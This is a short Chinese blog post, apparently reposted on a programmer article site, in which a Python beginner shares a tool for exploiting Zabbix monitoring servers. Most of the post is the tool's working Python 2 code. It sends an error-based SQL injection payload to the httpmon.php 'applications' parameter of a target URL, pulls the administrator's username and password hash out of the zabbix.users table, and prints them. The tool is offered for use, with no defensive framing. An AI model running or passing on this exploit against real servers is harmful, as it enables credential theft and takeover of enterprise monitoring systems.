Zabbix漏洞利用工具(新手学python)

程序员文章站 2022-04-03 11:05:00

最近学习 python,先来无事，写了一个Zabbix的漏洞利用工具，主要用了BeatuifulSoup模块，使用的时候需要先安装这个模块！ Zabbix是一些大...

最近学习 python,先来无事，写了一个Zabbix的漏洞利用工具，主要用了BeatuifulSoup模块，使用的时候需要先安装这个模块！

Zabbix是一些大中型企业常用的一款服务器管理监控系统，能够监控服务器的状态，并且能够实现批量配置服务器，是一款很给力的系统！

贴上代码：

#coding:gbk
__author__ = 'nx4dm1n'
import urllib
import urllib2
import BeautifulSoup
try:
    Zabbix_url=raw_input("Please input the Url(带https://):")
    content=urllib.urlopen(Zabbix_url)
    fzadminmd5_url=""
    fzadminsession_url=""

    if content.getcode()==200:
        fzadminmd5_url=Zabbix_url+"/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
        req=urllib2.urlopen(fzadminmd5_url)
        html=req.read()
        soup=BeautifulSoup.BeautifulSoup(html)
        sqlerror=soup.findAll(attrs={"class":"error"})
        adminmd5=str(sqlerror).split("Duplicate entry")[1].split("~~1")
        print adminmd5[0]
    else:
        pass
except IOError:
    print "maybe the url is 404"

上一篇： iPhone X国行逼近万元：每月699元连付12月如何？

下一篇：仿天易love读狂牛Key工具源码